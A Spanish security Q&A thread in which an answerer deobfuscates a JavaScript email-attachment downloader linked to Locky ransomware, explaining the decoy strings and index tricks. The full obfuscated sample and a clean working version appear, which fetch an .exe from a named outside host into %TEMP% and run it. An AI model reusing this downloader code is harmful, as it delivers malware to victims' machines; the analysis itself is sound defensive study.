¿Cómo funciona este ataque de javascript?


Hay una pregunta cerrada en StackOverflow con un fragmento de código similar, pero se cerró porque no se trataba de una pregunta relacionada con la programación, así que pensé en hacerla aquí.

Llegó por correo electrónico dentro de un archivo Zip; al abrirlo en Notepad++ el archivo JS se puede leer y (¿probablemente?) no se ejecuta. También hay muchos resultados en Google al buscar un fragmento del código, que enlazan a una página que indica que es ransomware, pero ¿se puede explicar qué hace realmente este código?

Las secuencias de palabras aparentemente aleatorias parecen estar ahí para evitar que el código coincida con firmas conocidas de malware, y las cadenas se manipulan para formar código que luego se ejecuta.

// Obfuscated Windows Script Host downloader (the sample the question asks about).
// ActiveXObject exists only under WSH (wscript.exe/cscript.exe) and legacy IE, so the
// file does nothing when opened in a text editor but runs under WSH when a .js
// attachment is double-clicked on Windows. The comments below record what each
// line resolves to; the many assignments of jQuery fragments to variables that are
// never read only pad the file.
iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };"; // decoy: never referenced
fergusI = 0;
// Helper returning only the first character of a string; used to rebuild property names.
String.prototype.contradistinction = function () { return this.substr(0, 1); };
// String table. A parenthesised comma list evaluates to its last operand, so
// ("dingle","adornment","n") is simply "n". The token "incentive" is a decoy that
// split("incentive").join("") strips from the longer entries before they are used.
var uUXTro = [("dingle","adornment","n")+"hh"+("precipitous","astounding","peruse","devon","lH")+"CNAl", "A"+"iR"+"Nh"+("dover","ambiguous","diocese","cD")+"nBHy", "E"+"xpan"+("disable","foamy","titled","mandate","dEnviron")+"me"+"nt"+"Stri"+("river","polyphonic","ngs"), ("flower","centered","gently","petiole","")+"%"+("spirituality","unabashed","TE")+"MP%", ""+("interaction","career","perception",".")+"exe", ("wives","electrical","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("regarded","crossroads","vi")+("botanist","expense","explains","manatarms","nc")+"enti"+"ve"+"eXincentiv"+("excruciating","futures","concepts","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("vaccination","metres","twill","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("writing","tiffany","S"), "AmvHaUzPHrP", ("humdrum","cavernous","suave","beryl","h")+"in"+"ce"+("vespers","bountiful","gripe","nt")+"iv"+"ee"+("terrier","echoing","education","li")+"nc"+("tranny","basilica","en")+"ti"+("cooperate","festive","modem","gains","vel"), "UJcMlBfkOA", "G"+("centers","aqueduct","plugins","rRAF")+"Ka"+("creased","storing","twine","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("enthusiast","pounce","iniquitous","Xi")+"nc"+"en"+("optical","migration","disks","marche","ti")+"ve"+("describe","impaired","israeli","ML")+"in"+"ce"+("sorts","fabled","nt")+("usurped","federal","iv")+"e2" + "."+"in"+"ce"+("decoy","lobby","brazilian","supervisors","nt")+("rancorous","pierce","terror","iv")+"eXMi"+"ncenti"+("stretcher","depict","sheer","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;"; // decoy: never referenced
// Removes two filler entries (indices 7 and 8) so the later indices line up.
uUXTro.splice(7, fergusI + 2);
// Entry 6 resolves to "ActiveXObject"; it is looked up on `this`, the global object at script top level.
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
AapDxox = "IdauNqhuT"; // decoy: never referenced
societies = (("notoriety", "linguist", "HiLPFi", "ventures", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction(); // "p"
theoriess = (("inalienable", "cognizance", "ziHwqRxJu", "dozen", "sSBVEfa") + "xEqzqkRRVx").contradistinction(); // "s"

fergusI = 6;
// Joins "WScript.S" and "hell" (decoys still embedded until the split/join below).
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
// Removes three more filler entries starting at index 8.
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join(""); // "WScript.Shell"
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + ""); // new ActiveXObject("WScript.Shell")
YPlWYgwd = " for ( ; n; n = n.nextSibling ) { if ( n.nodeType === 1 && n !== elem ) { matched.push( n ); } "; // decoy: never referenced
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join(""); // "MSXML2.XMLHTTP"
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]); // new ActiveXObject("MSXML2.XMLHTTP")
KNgrjvc = " var siblings = function( n, elem ) { var matched = [];"; // decoy: never referenced
fergusI /= 2; // fergusI is now 4
// shell.ExpandEnvironmentStrings("%TEMP%"): the directory the payload is written to.
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
KcjXPEtu = "} return matched; };"; // decoy: never referenced
revealede = (("underlying", "scrip", "eYyeHhl", "angular", "EbYlGrsShJg") + "qWuYEw").contradistinction(); // "E"

// poseidon: URL to fetch; economic: base name of the .exe written under %TEMP%.
function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI]; // %TEMP%/<economic>.exe
    LjujlQ = "} return jQuery.grep( elements, function( elem ) { return ( jQuery.inArray( elem, qualifier ) > -1 ) !== not; } ); "; // decoy: never referenced
// xhr.open("GET", poseidon, false): synchronous request, so status is available right after send().
zBqJutIT["o" + societies + revealede + "n"](("aviation","unreliable","nutrition","published","G") + revealede + ("mouth","consensus","agents","pricing","T"), poseidon, false);

QcwDedGUE = "}jQuery.filter = function( expr, elems, not ) { var elem = elems[ 0 ];"; // decoy: never referenced
// xhr.send()
zBqJutIT[theoriess + ("republicans","aggrandizement","e") + (("educated", "hybrid", "vQJtIpP", "enact", "torpor", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("lingo", "caitiff", "CEdBvsmD", "dealtime", "vbulletin", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();
wGSsSnAuJ = " if ( not ) { expr = \":not(\" + expr + \")\"; "; // decoy: never referenced
if (zBqJutIT.status == 200) {
    // new ActiveXObject("ADODB.Stream"): used to write the raw response bytes to disk.
    var PbOLTH = new lrAXrUK((""+("slang","biology","A")+"pO"+("intimate","dramatist","easterly","encouraging","DB.") + ""+"S"+("sheila","premises","fatherless","tr")+"eam").replace("p", "D"));
    PbOLTH.open();
    RvweTKriM = "var rsingleTag = ( /^<([\w-]+)\s*\/?>(?:<\/>|)$/ );"; // decoy: never referenced
    // Arithmetic evaluates to 1 (adTypeBinary): the stream holds binary data.
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    aODTVaRhyp = "var risSimple = /^.[^:#\[\.,]*$/;"; // decoy: never referenced
    // stream.write(xhr.ResponseBody)
    PbOLTH[("sonnet","heath","dried","mains","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("capsule","begin","enlargement","heracles","pon") + theoriess + "e"+"Bo"+("laconically","discovery","dy")]);
    eUVrfTIaq = " Implement the identical functionality for filter and not function winnow( elements, qualifier, not ) { if ( jQuery.isFunction( qualifier ) ) { return jQuery.grep( elements, function( elem, i ) { /* jshint -W018 */ return !!qualifier.call( elem, i, elem ) !== not; } );"; // decoy: never referenced
    // stream.position = 0
    PbOLTH[(societies + "o"+"Di"+("unpopular","anarchist","remix","tying","ti")+"on").replace("D", theoriess)] = 0;
    rURMWYFCS = "} if ( qualifier.nodeType ) { return jQuery.grep( elements, function( elem ) { return ( elem === qualifier ) !== not; } );"; // decoy: never referenced
    // stream.saveToFile(jersey, 2): 2 is adSaveCreateOverWrite, so an existing file is replaced.
    PbOLTH["sav"+"eT"+"oF"+("silhouette","participate","eligible","employed","ile")](jersey, 2);
    JzDFHcYwRvt = "} if ( typeof qualifier === \"string\" ) { if ( risSimple.test( qualifier ) ) { return jQuery.filter( qualifier, elements, not ); "; // decoy: never referenced
    PbOLTH.close();
    ueMAAMNPHiw = "} qualifier = jQuery.filter( qualifier, elements ); "; // decoy: never referenced
    // shell.Run(jersey, 1, false): launches the downloaded file (the string comparison is always false,
    // i.e. do not wait for it to exit). The trailing assignment is another decoy.
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); wQXGGA = " if ( typeof selector !== \"string\" ) { return this.pushStack( jQuery( selector ).filter( function() { for ( i = 0; i < len; i++ ) { if ( jQuery.contains( self[ i ], this ) ) { return true; } } } ) ); ";
}

// Empty catch: any failure (no network, COM object blocked, write denied) is swallowed,
// so the script exits without an error dialog and leaves nothing for the user to notice.
} catch (HiQurqnDJ) { };

hUivzNY = "jQuery.fn.extend( { find: function( selector ) { var i, ret = [], self = this, len = self.length;"; // decoy: never referenced
}
// Entry point: the download URL and the base name of the dropped file.
undeveloped(("craven","surgical","motels","h")+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+("grandchildren","probabilities","nudity","normal","ka")+"rta.co"+"m/"+"sy"+"stem"+("dorset","portal","advertise","substantial","/l")+("mango","thrush","productive","ogs/98")+("flush","cyclone","h7")+("johnson","studying","b66gb.")+"exe","yROdkAds");
NrQwRjPqXlj = "} return elems.length === 1 && elem.nodeType === 1 ? jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] : jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) { return elem.nodeType === 1; } ) ); };"; // decoy: never referenced
    
pregunta JLo 22.03.2016 - 14:13

1 respuesta


Hay muchas cadenas sin usar: algunas a la izquierda del operador coma y otras asignadas a variables que nunca se leen (parecen fragmentos de código de jQuery; jQuery en realidad no se usa aquí).

Elimina todo eso y te queda:

// Same sample with the unused decoy assignments and the comma-operator padding removed.
// Everything still runs only under Windows Script Host, where ActiveXObject is defined.
fergusI = 0;
// Returns only the first character of a string; used to rebuild property names.
String.prototype.contradistinction = function () { return this.substr(0, 1); };
// String table; "incentive" is a decoy token stripped with split/join before use.
var uUXTro = ["n"+"hh"+"lH"+"CNAl", "A"+"iR"+"Nh"+"cD"+"nBHy", "E"+"xpan"+"dEnviron"+"me"+"nt"+"Stri"+"ngs", ""+"%"+"TE"+"MP%", ""+"."+"exe", "R"+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+"vi"+"nc"+"enti"+"ve"+"eXincentiv"+"eObinc"+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", "W"+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + "S", "AmvHaUzPHrP", "h"+"in"+"ce"+"nt"+"iv"+"ee"+"li"+"nc"+"en"+"ti"+"vel", "UJcMlBfkOA", "G"+"rRAF"+"Ka"+"je"+"To", "Min"+"ce"+"ntiv"+"eS"+"Xi"+"nc"+"en"+"ti"+"ve"+"ML"+"in"+"ce"+"nt"+"iv"+"e2" + "."+"in"+"ce"+"nt"+"iv"+"eXMi"+"ncenti"+"ve"+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
uUXTro.splice(7, fergusI + 2); // drops two filler entries
chubby = uUXTro[1+4+1].split("incentive").join(""); // "ActiveXObject"
var lrAXrUK = this[chubby]; // the global ActiveXObject constructor
societies = ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction(); // "p"
theoriess = ("sSBVEfa" + "xEqzqkRRVx").contradistinction(); // "s"

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3]; // "WScript.S" + "hell"
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4); // drops three filler entries
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join(""); // "WScript.Shell"
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + ""); // shell object
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join(""); // "MSXML2.XMLHTTP"
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]); // HTTP request object
fergusI /= 2; // now 4
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]); // ExpandEnvironmentStrings("%TEMP%")
revealede = ("EbYlGrsShJg" + "qWuYEw").contradistinction(); // "E"

// poseidon: URL to fetch; economic: base name of the .exe dropped in %TEMP%.
function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI]; // %TEMP%/<economic>.exe
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false); // open("GET", url, false)

zBqJutIT[theoriess + "e" + ("nxldkIa" + "GyucrQNudzq").contradistinction() + ("dMNcSDdMEzF" + "wKxDlSnr").contradistinction()](); // send()
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+"A"+"pO"+"DB." + ""+"S"+"tr"+"eam").replace("p", "D")); // "ADODB.Stream"
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1); // evaluates to 1: binary stream
    PbOLTH["w"+"ri"+"te"](zBqJutIT[""+"R"+"es"+"pon" + theoriess + "e"+"Bo"+"dy"]); // write(ResponseBody)
    PbOLTH[(societies + "o"+"Di"+"ti"+"on").replace("D", theoriess)] = 0; // position = 0
    PbOLTH["sav"+"eT"+"oF"+"ile"](jersey, 2); // overwrite if present
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); // Run(jersey, 1, false)
}

// Errors are swallowed so a failed download leaves no visible trace.
} catch (HiQurqnDJ) { };

}
undeveloped("h"+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+"ka"+"rta.co"+"m/"+"sy"+"stem"+"/l"+"ogs/98"+"h7"+"b66gb."+"exe","yROdkAds");

Ahora queda mucha concatenación de cadenas muy simple que limpiar. Además, el método contradistinction que define para los objetos String solo devuelve el primer carácter de la cadena; así, por ejemplo, ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction() significa simplemente "p". Resuelve todo eso y obtienes:

// Same sample after resolving the trivial string concatenations and the
// first-character helper; only the "incentive" decoy token and the index
// arithmetic on uUXTro remain.
fergusI = 0;
var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"];
uUXTro.splice(7, fergusI + 2); // drops two filler entries
chubby = uUXTro[1+4+1].split("incentive").join(""); // "ActiveXObject"
var lrAXrUK = this[chubby]; // the global ActiveXObject constructor (WSH only)
societies = "p";
theoriess = "s";

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3]; // "WScript.S" + "hell" (decoys still inside)
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4); // drops three filler entries
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join(""); // "WScript.Shell"
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + ""); // shell object
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join(""); // "MSXML2.XMLHTTP"
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]); // HTTP request object
fergusI /= 2; // now 4
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]); // ExpandEnvironmentStrings("%TEMP%")
revealede = "E";

// poseidon: URL to fetch; economic: base name of the .exe dropped in %TEMP%.
function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI]; // %TEMP%/<economic>.exe
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false); // open("GET", url, false)

zBqJutIT[theoriess + "end"](); // send()
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK(("ApODB.Stream").replace("p", "D")); // "ADODB.Stream"
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1); // evaluates to 1: binary stream
    PbOLTH["write"](zBqJutIT["Respon" + theoriess + "eBody"]); // write(ResponseBody)
    PbOLTH[(societies + "oDition").replace("D", theoriess)] = 0; // position = 0
    PbOLTH["saveToFile"](jersey, 2); // overwrite if present
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); // Run(jersey, 1, false)
}

// Errors are swallowed so a failed download leaves no visible trace.
} catch (HiQurqnDJ) { };

}
undeveloped("http://softlensjakarta.com/system/logs/98h7b66gb.exe","yROdkAds");

La URL que ahora es claramente visible en la última línea es el punto principal.

Con todas las llamadas .split("incentive").join(""), la cadena incentive es un señuelo que se elimina de todas las cadenas largas antes de usarlas. Haz lo mismo con el valor inicial de uUXTro y varias de las cadenas se vuelven reconocibles:

var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActiveXObject", "sFtalU", "FlAYMT", "WScript.S", "AmvHaUzPHrP", "hell", "UJcMlBfkOA", "GrRAFKajeTo", "MSXML2.XMLHTTP"];

No seguiré el resto de los pasos, pero es bastante sencillo seguir lo que ocurre: fergusI toma varios valores enteros que indexan la matriz uUXTro, se hacen algunas concatenaciones más de cadenas, se eliminan con splice algunas cadenas señuelo de uUXTro (aunque quedan otras), y el resultado final es básicamente este:

// Deobfuscated equivalent of the sample: a Windows Script Host downloader.
// From a defender's view the telltale behaviour is wscript.exe creating
// WScript.Shell, MSXML2.XMLHTTP and ADODB.Stream, making an outbound HTTP
// request, writing a new .exe under %TEMP% and then launching it; that
// process/file/network chain is what endpoint telemetry should alert on.
// Blocking WSH for mail attachments (or re-associating .js files with a text
// editor) stops this whole class of sample before it runs.
var shell = new ActiveXObject("WScript.Shell");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
// Drop path: %TEMP% expanded at run time plus a fixed file name.
var exe = shell.ExpandEnvironmentStrings("%TEMP%") + "/yROdkAds.exe";
// Synchronous GET, so xhr.status is valid immediately after send().
xhr.open("GET", "http://softlensjakarta.com/system/logs/98h7b66gb.exe", false);
xhr.send();
if(xhr.status == 200) {
  // Binary stream (type 1) used to write the raw response body to disk.
  var stream = new ActiveXObject("ADODB.Stream");
  stream.open();
  stream.type=1;
  stream.write(xhr.ResponseBody);
  stream.position = 0;
  stream.saveToFile(exe, 2); // 2 = overwrite an existing file
  stream.close();
  // Window style 1, do not wait for the child: the downloaded payload is executed.
  shell.Run(exe, 1, false);
}

donde he tomado las 4 variables más importantes y les he dado nombres descriptivos:

shell era OoKse
xhr era zBqJutIT
exe era jersey
stream era PbOLTH

En resumen, este script es un descargador (downloader): quiere recuperar y ejecutar un programa desde un servidor controlado por el atacante. Si intento acceder directamente a la URL de softlensjakarta, obtengo un archivo de 12 bytes con los caracteres STUPID LOCKY. Eso podría significar que era un servidor comprometido que ya ha sido limpiado (y "STUPID LOCKY" es la idea que alguien tiene de un mensaje de permiso denegado), o podría ser un servidor malicioso bastante astuto que comprueba el User-Agent en busca de uno vulnerable antes de servir el malware real.

Con los descargadores maliciosos nunca se puede saber realmente cuál será la carga útil con solo mirar el código del descargador. Puede haber muchos programas maliciosos distintos servidos desde la misma URL, en una rotación determinada por cuánto pagan otros autores de malware a quien te engañó para ejecutar el descargador (malware de pago por instalación).

    
respondido por el Wumpus Q. Wumbley 22.03.2016 - 17:20
